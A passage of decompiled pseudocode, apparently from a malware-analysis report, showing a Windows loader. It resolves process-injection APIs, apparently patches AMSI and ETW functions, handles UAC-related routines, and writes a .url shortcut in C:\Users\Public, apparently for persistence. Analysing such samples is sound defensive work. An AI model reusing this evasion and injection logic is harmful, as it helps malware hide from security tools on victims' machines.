                    								E03277C04(_v4596,  *0x33928a8, _t6381, __eflags);
                    								E03264698( &_v4604, "VirtualAlloc");
                    								_push(_v4604);
                    								E03264698( &_v4608, "kernel32");
                    								_pop(_t6384);
                    								E03277C04(_v4608,  *0x33928a8, _t6384, __eflags);
                    								E03264698( &_v4612, "VirtualAllocEx");
                    								_push(_v4612);
                    								E03264698( &_v4616, "kernel32");
                    								_pop(_t6387);
                    								E03277C04(_v4616,  *0x33928a8, _t6387, __eflags);
                    								E03264698( &_v4620, "VirtualProtect");
                    								_push(_v4620);
                    								E03264698( &_v4624, "kernel32");
                    								_pop(_t6390);
                    								E03277C04(_v4624,  *0x33928a8, _t6390, __eflags);
                    								E03264698( &_v4628, "OpenProcess");
                    								_push(_v4628);
                    								E03264698( &_v4632, "kernel32");
                    								_pop(_t6393);
                    								E03277C04(_v4632, _t5635, _t6393, __eflags);
                    								E03264698( &_v4636, "WriteVirtualMemory");
                    								_push(_v4636);
                    								E03264698( &_v4640, "kernel32");
                    								_pop(_t6396);
                    								E03277C04(_v4640, _t5635, _t6396, __eflags);
                    								E03264698( &_v4644, "FlushInstructionCache");
                    								_push(_v4644);
                    								E03264698( &_v4648, "kernel32");
                    								_pop(_t6399);
                    								E03277C04(_v4648, _t5635, _t6399, __eflags);
                    								E03264698( &_v4652, "SetUnhandledExceptionFilter");
                    								_push(_v4652);
                    								E03264698( &_v4656, "kernel32");
                    								_pop(_t6402);
                    								E03277C04(_v4656, _t5635, _t6402, __eflags);
                    								E03264698( &_v4660, "NtGetWriteWatch");
                    								_push(_v4660);
                    								E03264698( &_v4664, "ntdll");
                    								_pop(_t6405);
                    								E03277C04(_v4664, _t5635, _t6405, __eflags);
                    								E03264698( &_v4668, "NtQueryVirtualMemory");
                    								_push(_v4668);
                    								E03264698( &_v4672, "ntdll");
                    								_pop(_t6408);
                    								E03277C04(_v4672, _t5635, _t6408, __eflags);
                    								E03264698( &_v4676, "NtQueryInformationThread");
                    								_push(_v4676);
                    								E03264698( &_v4680, "ntdll");
                    								_pop(_t6411);
                    								E03277C04(_v4680, _t5635, _t6411, __eflags);
                    								E03264698( &_v4684, "NtOpenSection");
                    								_push(_v4684);
                    								E03264698( &_v4688, "ntdll");
                    								_pop(_t6414);
                    								E03277C04(_v4688, _t5635, _t6414, __eflags);
                    								E03264698( &_v4692, "NtCreateSection");
                    								_push(_v4692);
                    								E03264698( &_v4696, "ntdll");
                    								_pop(_t6417);
                    								E03277C04(_v4696, _t5635, _t6417, __eflags);
                    								E03264698( &_v4700, "NtMapViewOfSection");
                    								_push(_v4700);
                    								E03264698( &_v4704, "ntdll");
                    								_pop(_t6420);
                    								E03277C04(_v4704, _t5635, _t6420, __eflags);
                    								E03264698( &_v4708, "NtReadVirtualMemory");
                    								_push(_v4708);
                    								E03264698( &_v4712, "ntdll");
                    								_pop(_t6423);
                    								E03277C04(_v4712, _t5635, _t6423, __eflags);
                    								E03264698( &_v4716, "NtQuerySecurityObject");
                    								_push(_v4716);
                    								E03264698( &_v4720, "ntdll");
                    								_pop(_t6426);
                    								E03277C04(_v4720, _t5635, _t6426, __eflags);
                    								E03264698( &_v4724, "NtAccessCheck");
                    								_push(_v4724);
                    								E03264698( &_v4728, "ntdll");
                    								_pop(_t6429);
                    								E03277C04(_v4728, _t5635, _t6429, __eflags);
                    								E03264698( &_v4732, "LdrLoadDll");
                    								_push(_v4732);
                    								E03264698( &_v4736, "ntdll");
                    								_pop(_t6432);
                    								E03277C04(_v4736, _t5635, _t6432, __eflags);
                    								E03264698( &_v4740, "LdrGetProcedureAddress");
                    								_push(_v4740);
                    								E03264698( &_v4744, "ntdll");
                    								_pop(_t6435);
                    								E03277C04(_v4744, _t5635, _t6435, __eflags);
                    								E03264698( &_v4748, "NtWriteVirtualMemory");
                    								_push(_v4748);
                    								E03264698( &_v4752, "ntdll");
                    								_pop(_t6438);
                    								E03277C04(_v4752, _t5635, _t6438, __eflags);
                    								E03264698( &_v4756, "NtOpenFile");
                    								_push(_v4756);
                    								E03264698( &_v4760, "ntdll");
                    								_pop(_t6441);
                    								E03277C04(_v4760, _t5635, _t6441, __eflags);
                    								E03264698( &_v4764, "EtwEventWriteEx");
                    								_push(_v4764);
                    								E03264698( &_v4768, "ntdll");
                    								_pop(_t6444);
                    								E03277C04(_v4768, _t5635, _t6444, __eflags);
                    								E03264698( &_v4772, "EtwEventWrite");
                    								_push(_v4772);
                    								E03264698( &_v4776, "ntdll");
                    								_pop(_t6447);
                    								E03277C04(_v4776, _t5635, _t6447, __eflags);
                    								FlushInstructionCache(GetCurrentProcess(), 0, 0);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v4780, E03264964(_v4784));
                    								_push(_v4780);
                    								E032647B0( &_v4792,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4788, E03264964(_v4792));
                    								_pop(_t6452);
                    								E03277C04(_v4788,  *0x33928a8, _t6452, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v4796, E03264964(_v4800));
                    								_push(_v4796);
                    								E032647B0( &_v4808,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4804, E03264964(_v4808));
                    								_pop(_t6457);
                    								E03277C04(_v4804,  *0x33928a8, _t6457, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v4812, E03264964(_v4816));
                    								_push(_v4812);
                    								E032647B0( &_v4824,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v4820, E03264964(_v4824));
                    								_pop(_t6462);
                    								E03277C04(_v4820,  *0x33928a8, _t6462, __eflags);
                    								E03277B14(GetCurrentProcess(), "NtOpenProcess");
                    								ExitProcess(0);
                    								goto L49;
                    							} else {
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v3524, E03264964(_v3528));
                    								_push(_v3524);
                    								E032647B0( &_v3536,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3532, E03264964(_v3536));
                    								_pop(_t6625);
                    								E03277C04(_v3532,  *0x33928a8, _t6625, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v3540, E03264964(_v3544));
                    								_push(_v3540);
                    								E032647B0( &_v3552,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3548, E03264964(_v3552));
                    								_pop(_t6630);
                    								E03277C04(_v3548,  *0x33928a8, _t6630, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v3556, E03264964(_v3560));
                    								_push(_v3556);
                    								E032647B0( &_v3568,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3564, E03264964(_v3568));
                    								_pop(_t6635);
                    								E03277C04(_v3564,  *0x33928a8, _t6635, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v3572, E03264964(_v3576));
                    								_push(_v3572);
                    								E032647B0( &_v3584,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3580, E03264964(_v3584));
                    								_pop(_t6640);
                    								E03277C04(_v3580,  *0x33928a8, _t6640, __eflags);
                    								E032647B0( &_v3588,  *0x3392820, "C:\\Windows\\System32\\");
                    								WinExec(E03264964(_v3588), 0);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v3592, E03264964(_v3596));
                    								_push(_v3592);
                    								E032647B0( &_v3604,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3600, E03264964(_v3604));
                    								_pop(_t6646);
                    								E03277C04(_v3600,  *0x33928a8, _t6646, __eflags);
                    								E03264698( &_v3608, E03264964( *0x3392820));
                    								E0327A3A4(_v3608, _t5539, 0x3392888, _t7104, _t7105, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v3612, E03264964(_v3616));
                    								_push(_v3612);
                    								E032647B0( &_v3624,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3620, E03264964(_v3624));
                    								_pop(_t6653);
                    								E03277C04(_v3620,  *0x33928a8, _t6653, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v3628, E03264964(_v3632));
                    								_push(_v3628);
                    								E032647B0( &_v3640,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3636, E03264964(_v3640));
                    								_pop(_t6658);
                    								E03277C04(_v3636,  *0x33928a8, _t6658, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v3644, E03264964(_v3648));
                    								_push(_v3644);
                    								E032647B0( &_v3656,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3652, E03264964(_v3656));
                    								_pop(_t6663);
                    								E03277C04(_v3652,  *0x33928a8, _t6663, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v3660, E03264964(_v3664));
                    								_push(_v3660);
                    								E032647B0( &_v3672,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3668, E03264964(_v3672));
                    								_pop(_t6668);
                    								E03277C04(_v3668,  *0x33928a8, _t6668, __eflags);
                    								 *0x339278c = E03263694(1);
                    								_push(_t7107);
                    								_push(0x3284646);
                    								_push( *[fs:edx]);
                    								 *[fs:edx] = _t7108;
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v3676, E03264964(_v3680));
                    								_push(_v3676);
                    								E032647B0( &_v3688,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3684, E03264964(_v3688));
                    								_pop(_t6675);
                    								E03277C04(_v3684,  *0x33928a8, _t6675, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v3692, E03264964(_v3696));
                    								_push(_v3692);
                    								E032647B0( &_v3704,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3700, E03264964(_v3704));
                    								_pop(_t6680);
                    								E03277C04(_v3700,  *0x33928a8, _t6680, __eflags);
                    								_v1112 =  *0x3392870;
                    								_t5691 = _v1112;
                    								__eflags = _t5691;
                    								if(_t5691 != 0) {
                    									_t5702 = _t5691 - 4;
                    									__eflags = _t5702;
                    									_t5691 =  *_t5702;
                    								}
                    								asm("cdq");
                    								E0327593C( *0x339278c, _t5691, _t6680);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v3708, E03264964(_v3712));
                    								_push(_v3708);
                    								E032647B0( &_v3720,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3716, E03264964(_v3720));
                    								_pop(_t6685);
                    								E03277C04(_v3716,  *0x33928a8, _t6685, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v3724, E03264964(_v3728));
                    								_push(_v3724);
                    								E032647B0( &_v3736,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3732, E03264964(_v3736));
                    								_pop(_t6690);
                    								E03277C04(_v3732,  *0x33928a8, _t6690, __eflags);
                    								E03275AE4( *0x339278c,  *((intOrPtr*)( *((intOrPtr*)( *0x339278c))))() + _t4378 +  *((intOrPtr*)( *((intOrPtr*)( *0x339278c))))() + _t4378,  *0x3392870);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v3740, E03264964(_v3744));
                    								_push(_v3740);
                    								E032647B0( &_v3752,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3748, E03264964(_v3752));
                    								_pop(_t6697);
                    								E03277C04(_v3748,  *0x33928a8, _t6697, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v3756, E03264964(_v3760));
                    								_push(_v3756);
                    								E032647B0( &_v3768,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3764, E03264964(_v3768));
                    								_pop(_t6702);
                    								E03277C04(_v3764,  *0x33928a8, _t6702, __eflags);
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v3772, E03264964(_v3776));
                    								_push(_v3772);
                    								E032647B0( &_v3784,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v3780, E03264964(_v3784));
                    								_pop(_t6707);
                    								E03277C04(_v3780,  *0x33928a8, _t6707, __eflags);
                    								E0327A6F4(_t5539, _t7104, _t7105,  *0x339278c,  *0x3392888);
                    								__eflags = 0;
                    								_pop(_t6708);
                    								 *[fs:eax] = _t6708;
                    								_push(0x328464d);
                    								return E032636C4( *0x339278c);
                    							}
                    						} else {
                    							_push( *0x339287c);
                    							_push(0x3286d78);
                    							_push(0x3286e54);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0x3286e60);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0x3286e48);
                    							E03264824();
                    							E03264698( &_v2396, E03264964(_v2400));
                    							_t4435 = E03267E40(_v2396);
                    							__eflags = _t4435;
                    							if(_t4435 != 0) {
                    								goto L32;
                    							} else {
                    								_push(0x3286aa0);
                    								_push( *0x33928a8);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v2404, E03264964(_v2408));
                    								_push(_v2404);
                    								E032647B0( &_v2416,  *0x33928a8, 0x3286aa0);
                    								E03264698( &_v2412, E03264964(_v2416));
                    								_pop(_t6715);
                    								E03277C04(_v2412,  *0x33928a8, _t6715, __eflags);
                    								E03264698( &_v2420, "C:\\Windows\\SysWOW64");
                    								_t4453 = E03267E64(_v2420);
                    								__eflags = _t4453;
                    								if(_t4453 == 0) {
                    									goto L32;
                    								} else {
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("Initialize");
                    									E03264824();
                    									E03264698( &_v2424, E03264964(_v2428));
                    									_push(_v2424);
                    									E032647B0( &_v2436,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v2432, E03264964(_v2436));
                    									_pop(_t6721);
                    									E03277C04(_v2432,  *0x33928a8, _t6721, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v2440, E03264964(_v2444));
                    									_push(_v2440);
                    									E032647B0( &_v2452,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v2448, E03264964(_v2452));
                    									_pop(_t6726);
                    									E03277C04(_v2448,  *0x33928a8, _t6726, __eflags);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v2456, E03264964(_v2460));
                    									_push(_v2456);
                    									E032647B0( &_v2468,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v2464, E03264964(_v2468));
                    									_pop(_t6731);
                    									E03277C04(_v2464,  *0x33928a8, _t6731, __eflags);
                    									 *0x3392884 = E03263694(1);
                    									 *[fs:eax] = _t7108;
                    									E03262F08(0x64);
                    									E03267974( &_v2472);
                    									 *((intOrPtr*)( *((intOrPtr*)( *0x3392884)) + 0x38))( *[fs:eax], 0x3282571, _t7107);
                    									_push(0x3286aa0);
                    									_push( *0x33928a8);
                    									_push(0x3286e80);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push("acS");
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push(0);
                    									_push("can");
                    									E03264824();
                    									E03264698( &_v2476, E03264964(_v2480));
                    									_push(_v2476);
                    									E032647B0( &_v2488,  *0x33928a8, 0x3286aa0);
                    									E03264698( &_v2484, E03264964(_v2488));
                    									_pop(_t6739);
                    									E03277C04(_v2484,  *0x33928a8, _t6739, __eflags);
                    									E03264824();
                    									E03264698( &_v2492, E03264964(_v2496));
                    									 *((intOrPtr*)( *((intOrPtr*)( *0x3392884)) + 0x74))(0, 0, 0, 0, 0, 0, 0, 0x3286e60, 0, 0, 0, 0, 0, 0, 0, 0x3286e54, 0x3286d78,  *0x339287c);
                    									__eflags = 0;
                    									_t6743 = 0x3286e48;
                    									 *[fs:eax] = _t6743;
                    									_push(0x3282578);
                    									return E032636C4( *0x3392884);
                    								}
                    							}
                    						}
                    					} else {
                    						_push("C:\\Users\\Public\\");
                    						_push( *0x33928cc);
                    						_push(".url");
                    						E03264824();
                    						E03264698( &_v1656, E03264964(_v1660));
                    						_t4535 = E03267E40(_v1656);
                    						_t7123 = _t4535;
                    						if(_t4535 != 0) {
                    							goto L28;
                    						} else {
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v1664, E03264964(_v1668));
                    							_push(_v1664);
                    							E032647B0( &_v1676,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1672, E03264964(_v1676));
                    							_pop(_t6750);
                    							E03277C04(_v1672,  *0x33928a8, _t6750, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v1680, E03264964(_v1684));
                    							_push(_v1680);
                    							E032647B0( &_v1692,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1688, E03264964(_v1692));
                    							_pop(_t6755);
                    							E03277C04(_v1688,  *0x33928a8, _t6755, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1696, E03264964(_v1700));
                    							_push(_v1696);
                    							E032647B0( &_v1708,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1704, E03264964(_v1708));
                    							_pop(_t6760);
                    							E03277C04(_v1704,  *0x33928a8, _t6760, _t7123);
                    							_push( *0x339287c);
                    							_push(0x3286d78);
                    							_push( *0x33928cc);
                    							E03264824();
                    							E03264698(0x33928c8, E03264964(_v1712));
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1716, E03264964(_v1720));
                    							_push(_v1716);
                    							E032647B0( &_v1728,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1724, E03264964(_v1728));
                    							_pop(_t6767);
                    							E03277C04(_v1724,  *0x33928a8, _t6767, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("Initialize");
                    							E03264824();
                    							E03264698( &_v1732, E03264964(_v1736));
                    							_push(_v1732);
                    							E032647B0( &_v1744,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1740, E03264964(_v1744));
                    							_pop(_t6772);
                    							E03277C04(_v1740,  *0x33928a8, _t6772, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v1748, E03264964(_v1752));
                    							_push(_v1748);
                    							E032647B0( &_v1760,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1756, E03264964(_v1760));
                    							_pop(_t6777);
                    							E03277C04(_v1756,  *0x33928a8, _t6777, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1764, E03264964(_v1768));
                    							_push(_v1764);
                    							E032647B0( &_v1776,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1772, E03264964(_v1776));
                    							_pop(_t6782);
                    							E03277C04(_v1772,  *0x33928a8, _t6782, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v1780, E03264964(_v1784));
                    							_push(_v1780);
                    							E032647B0( &_v1792,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1788, E03264964(_v1792));
                    							_pop(_t6787);
                    							E03277C04(_v1788,  *0x33928a8, _t6787, _t7123);
                    							_push("C:\\\\Users\\\\Public\\\\Libraries\\\\");
                    							_push( *0x33928cc);
                    							_push(0x3286dac);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0x3286db8);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0x3286dc4);
                    							E03264824();
                    							E03264698(0x33927ec, E03264964(_v1796));
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("UacScan");
                    							E03264824();
                    							E03264698( &_v1800, E03264964(_v1804));
                    							_push(_v1800);
                    							E032647B0( &_v1812,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1808, E03264964(_v1812));
                    							_pop(_t6794);
                    							E03277C04(_v1808,  *0x33928a8, _t6794, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v1816, E03264964(_v1820));
                    							_push(_v1816);
                    							E032647B0( &_v1828,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1824, E03264964(_v1828));
                    							_pop(_t6799);
                    							E03277C04(_v1824,  *0x33928a8, _t6799, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("Initialize");
                    							E03264824();
                    							E03264698( &_v1832, E03264964(_v1836));
                    							_push(_v1832);
                    							E032647B0( &_v1844,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1840, E03264964(_v1844));
                    							_pop(_t6804);
                    							E03277C04(_v1840,  *0x33928a8, _t6804, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v1848, E03264964(_v1852));
                    							_push(_v1848);
                    							E032647B0( &_v1860,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1856, E03264964(_v1860));
                    							_pop(_t6809);
                    							E03277C04(_v1856,  *0x33928a8, _t6809, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1864, E03264964(_v1868));
                    							_push(_v1864);
                    							E032647B0( &_v1876,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1872, E03264964(_v1876));
                    							_pop(_t6814);
                    							E03277C04(_v1872,  *0x33928a8, _t6814, _t7123);
                    							E03264DA4( &_v1880,  *0x33927ec);
                    							_push(_v1880);
                    							E03264DA4( &_v1888,  *0x3392878);
                    							E03264728( &_v1884, _v1888);
                    							_pop(_t6818);
                    							E0327CB04(_v1884, _t5539, _t6818, _t7105);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1892, E03264964(_v1896));
                    							_push(_v1892);
                    							E032647B0( &_v1904,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1900, E03264964(_v1904));
                    							_pop(_t6823);
                    							E03277C04(_v1900,  *0x33928a8, _t6823, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v1908, E03264964(_v1912));
                    							_push(_v1908);
                    							E032647B0( &_v1920,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1916, E03264964(_v1920));
                    							_pop(_t6828);
                    							E03277C04(_v1916,  *0x33928a8, _t6828, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1924, E03264964(_v1928));
                    							_push(_v1924);
                    							E032647B0( &_v1936,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1932, E03264964(_v1936));
                    							_pop(_t6833);
                    							E03277C04(_v1932,  *0x33928a8, _t6833, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v1940, E03264964(_v1944));
                    							_push(_v1940);
                    							E032647B0( &_v1952,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1948, E03264964(_v1952));
                    							_pop(_t6838);
                    							E03277C04(_v1948,  *0x33928a8, _t6838, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("Initialize");
                    							E03264824();
                    							E03264698( &_v1956, E03264964(_v1960));
                    							_push(_v1956);
                    							E032647B0( &_v1968,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1964, E03264964(_v1968));
                    							_pop(_t6843);
                    							E03277C04(_v1964,  *0x33928a8, _t6843, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v1972, E03264964(_v1976));
                    							_push(_v1972);
                    							E032647B0( &_v1984,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1980, E03264964(_v1984));
                    							_pop(_t6848);
                    							E03277C04(_v1980,  *0x33928a8, _t6848, _t7123);
                    							 *0x3392884 = E03263694(1);
                    							_push(_t7107);
                    							_push(0x32818e2);
                    							_push( *[fs:eax]);
                    							 *[fs:eax] = _t7108;
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v1988, E03264964(_v1992));
                    							_push(_v1988);
                    							E032647B0( &_v2000,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v1996, E03264964(_v2000));
                    							_pop(_t6854);
                    							E03277C04(_v1996,  *0x33928a8, _t6854, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v2004, E03264964(_v2008));
                    							_push(_v2004);
                    							E032647B0( &_v2016,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v2012, E03264964(_v2016));
                    							_pop(_t6859);
                    							E03277C04(_v2012,  *0x33928a8, _t6859, _t7123);
                    							 *((intOrPtr*)( *((intOrPtr*)( *0x3392884)) + 0x38))();
                    							E03264824();
                    							 *((intOrPtr*)( *((intOrPtr*)( *0x3392884)) + 0x38))(0x3286e00,  *0x33927ec, "URL=file:\"");
                    							E03262F08(0x3a);
                    							E03267974( &_v2028);
                    							E032647B0( &_v2024, _v2028, "IconIndex=");
                    							 *((intOrPtr*)( *((intOrPtr*)( *0x3392884)) + 0x38))();
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v2032, E03264964(_v2036));
                    							_push(_v2032);
                    							E032647B0( &_v2044,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v2040, E03264964(_v2044));
                    							_pop(_t6870);
                    							E03277C04(_v2040,  *0x33928a8, _t6870, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v2048, E03264964(_v2052));
                    							_push(_v2048);
                    							E032647B0( &_v2060,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v2056, E03264964(_v2060));
                    							_pop(_t6875);
                    							E03277C04(_v2056,  *0x33928a8, _t6875, _t7123);
                    							E03262F08(0x63);
                    							E03267974( &_v2068);
                    							E032647B0( &_v2064, _v2068, "HotKey=");
                    							 *((intOrPtr*)( *((intOrPtr*)( *0x3392884)) + 0x38))();
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v2072, E03264964(_v2076));
                    							_push(_v2072);
                    							E032647B0( &_v2084,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v2080, E03264964(_v2084));
                    							_pop(_t6883);
                    							E03277C04(_v2080,  *0x33928a8, _t6883, _t7123);
                    							_push(0x3286aa0);
                    							_push( *0x33928a8);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v2088, E03264964(_v2092));
                    							_push(_v2088);
                    							E032647B0( &_v2100,  *0x33928a8, 0x3286aa0);
                    							E03264698( &_v2096, E03264964(_v2100));
                    							_pop(_t6888);
                    							E03277C04(_v2096,  *0x33928a8, _t6888, _t7123);
                    							E03264824();
                    							E03264698( &_v2104, E03264964(_v2108));
                    							 *((intOrPtr*)( *((intOrPtr*)( *0x3392884)) + 0x74))(0, 0, 0, 0, 0x3286e3c, 0, 0, 0, 0, 0x3286e30,  *0x33928cc, "C:\\Users\\Public\\");
                    							_t6892 = 0x3286e48;
                    							 *[fs:eax] = _t6892;
                    							_push(0x32818e9);
                    							return E032636C4( *0x3392884);
                    						}
                    					}
                    				}
                    			}
                    0x032805bf
                    0x032805ca
                    0x032805cb
                    0x032805d0
                    0x032805d5
                    0x032805db
                    0x032805eb
                    0x03280603
                    0x0328060e
                    0x03280620
                    0x03280638
                    0x03280643
                    0x03280644
                    0x0328065b
                    0x03280666
                    0x0328066b
                    0x0328066d
                    0x03280673
                    0x03280678
                    0x0328067e
                    0x0328068e
                    0x032806a6
                    0x032806b1
                    0x032806c3
                    0x032806db
                    0x032806e6
                    0x032806e7
                    0x032806ec
                    0x032806f1
                    0x032806f7
                    0x03280707
                    0x0328071f
                    0x0328072a
                    0x0328073c
                    0x03280754
                    0x0328075f
                    0x03280760
                    0x03280777
                    0x03280782
                    0x03280782
                    0x03280787
                    0x0328078c
                    0x03280792
                    0x032807a2
